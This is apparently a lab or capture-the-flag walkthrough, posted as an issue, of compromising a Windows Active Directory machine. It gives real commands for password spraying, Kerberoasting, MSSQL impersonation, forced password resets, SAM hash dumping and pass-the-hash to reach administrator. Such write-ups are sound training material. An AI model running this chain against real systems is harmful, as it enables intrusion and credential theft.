Open WDavid404 opened 2 months ago
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-12 06:57:26Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8530/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
8531/tcp open unknown syn-ack ttl 125
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
47001/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49675/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49684/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49691/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49701/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49712/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49769/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
58538/tcp open ms-sql-s syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM
smbmap -u null -p "" -H 192.168.218.40 -P 445 -r 2>&1 --> no info
kerbrute -domain hokkaido-aerospace.com -dc-ip 192.168.184.40 -users /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 100
-->
users:
info
administrator
discovery
maintenance
create a small wordlist for password:
Winter2023
Summer2023
Spring2023
Fall2023
info
administrator
discovery
maintenance
ofni
rotartsinimda
yrevocsid
ecnanetniam
lets brute-force using crackmapexec…
crackmapexec smb 192.168.184.40 --shares -u users.txt -p pass.txt --continue-on-success
--> info:info
crackmapexec smb 192.168.184.40 --shares -u info -p info
On Homes share found directories create with name user’s name. Inside those directories didn't found anything.
on NETLOGON Share there is a temp folder which has a file password_reset.txt
That text file contain these text.
Initial Password: Start123!
crackmapexec smb 192.168.184.40 -u users.txt -p Start123! --continue-on-success
-->
discovery:Start123!
evil-winrm login ---> all failed
impacket-GetUserSPNs -dc-ip 192.168.184.40 hokkaido-aerospace.com/discovery:Start123! -request
Tried to crack maintenance user’s hash but failed.
Try to move to mssql server and succeed with discovery's credential.
impacket-mssqlclient 'hokkaido-aerospace.com/discovery':'Start123!'@192.168.208.40 -dc-ip 192.168.184.40 -windows-auth
check what are available database are there. MSSQL command refer to https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md
SQL (HAERO\discovery guest@master)> SELECT name FROM master..sysdatabases;
SQL (HAERO\discovery guest@master)> use hrappdb
--> ERROR: Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.
--> we don’t have permission to use hrappdb. lets check any user we can impersonate on mssql.
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
-->
hrappdb-reader
--> Lets login as user "hrappdb-reader" and use "hrappdb" database.
SQL (HAERO\discovery guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader'
SQL (hrappdb-reader guest@master)> use hrappdb
-->let view the data:
SQL (hrappdb-reader hrappdb-reader@hrappdb)> SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
SQL (hrappdb-reader hrappdb-reader@hrappdb)> select * from sysauth;
--> hrapp-service:Untimed$Runny
winrm login with this creds but no luck
Use bloodhound
bloodhound-python -u "hrapp-service" -p 'Untimed$Runny' -d hokkaido-aerospace.com -c all --zip -ns 192.168.208.40
-->
hrapp-service has genericWrite Permission To Hazel.Green user which is tier2admin
targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.208.40
-->
Got hash of the hazel.green user
by Cracking the hash we got password: haze1988
(targetedKerberoast.py: This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the "kerberoast" hash, and delete the temporary SPN set for that operation. This is called targeted Kerberoasting.)
In bloodhound we can se hazel.green is a member of IT Group so we can forcefully change pass of tier 1 admin which is MOLLY.SMITH… lets use rpcclient to set the password.
rpcclient -N 192.168.208.40 -U 'hazel.green%haze1988'
$> setuserinfo2 MOLLY.SMITH 23 'Password123!'
Login with MOLLY.SMITH credential
xfreerdp /u:molly.smith /p:'Password123!' /v:192.168.208.40 +clipboard
whoami /priv
--> SeBackupPrivilege
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
[Kali] impacket-secretsdump -system system -sam sam local
-->
[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
now evil-winrm to the machine using administrator account:
evil-winrm -i 192.168.184.40 -u administrator -H "d752482897d54e239376fddb2a2109e4"
Keypoints: